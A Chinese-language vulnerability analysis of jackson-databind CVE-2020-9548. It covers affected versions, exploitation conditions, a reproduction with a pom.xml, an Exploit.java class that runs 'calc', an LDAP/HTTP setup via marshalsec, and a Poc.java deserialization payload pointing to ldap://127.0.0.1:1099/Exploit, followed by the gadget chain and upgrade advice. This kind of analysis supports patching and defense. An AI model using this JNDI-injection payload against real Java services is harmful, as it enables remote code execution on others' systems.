跳转至

jackson-databind RCE CVE-2020-9548

影响范围

• jackson-databind before 2.9.10.4 • jackson-databind before 2.8.11.6 • jackson-databind before 2.7.9.7

漏洞类型

JDNI注入导致RCE 利用条件 • 开启enableDefaultTyping() • 使用了br.com.anteros.dbcp.AnterosDBCPConfig第三方依赖

漏洞概述

2020年3月,jackson-databind在github上更新了一个新的反序列化利用类br.com.anteros.dbcp.AnterosDBCPConfig,该类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成RCE。

漏洞复现

环境搭建 pom.xml:

 <dependencies>
    <dependency>
      <groupId>com.fasterxml.jackson.core</groupId>
      <artifactId>jackson-databind</artifactId>
      <version>2.9.9.1</version>
    </dependency>
      <!-- https://mvnrepository.com/artifact/br.com.anteros/Anteros-DBCP -->
      <dependency>
          <groupId>br.com.anteros</groupId>
          <artifactId>Anteros-DBCP</artifactId>
          <version>1.0.1</version>
      </dependency>
      <dependency>
      <groupId>org.slf4j</groupId>
      <artifactId>slf4j-nop</artifactId>
      <version>1.7.2</version>
    </dependency>
    <!-- https://mvnrepository.com/artifact/javax.transaction/jta -->
      <dependency>
          <groupId>javax.transaction</groupId>
          <artifactId>jta</artifactId>
          <version>1.1</version>
      </dependency>
  </dependencies>

漏洞利用

编译Exploit.java Exploit.java代码如下:

import java.lang.Runtime;

public class Exploit {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

搭建HTTP服务 使用Python搭建简易SimpleHTTPServer服务:

搭建LDAP服务 使用marshalsec来启动一个LDAP服务:

执行漏洞POC1 Poc.java代码如下所示:

package com.jacksonTest;

import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;

public class Poc {
    public static void main(String[] args) throws Exception {
       ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();
        String payload = "[\"br.com.anteros.dbcp.AnterosDBCPConfig\", {\"metricRegistry\":\"ldap://127.0.0.1:1099/Exploit\"}]";
        try {
            mapper.readValue(payload, Object.class);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

之后运行该程序,成功执行命令,弹出计算器:

漏洞分析

首先定位到br.com.anteros.dbcp.AnterosDBCPConfig类,之后发现一处可疑的JNDI注入:

由于参数来自object,所以之后全局搜索调用getObjectOrPerformJndiLookup函数调用的地方发现setMetricRegistry处有一处可控的调用,此处的参数metricRegistry可有json指定,之后传入getObjectOrPerformJndiLookup,之后再次传入lookup,从而导致JNDI注入的发生,并最终导致RCE:

整个利用链如下所示:

mapper.readValue
    ->setMetricRegistry
        ->getObjectOrPerformJndiLookup
             ->lookup

修复建议

• 及时将jackson-databind升级到安全版本 • 升级到较高版本的JDK。 参考链接 https://github.com/FasterXML/jackson-databind/issues/2634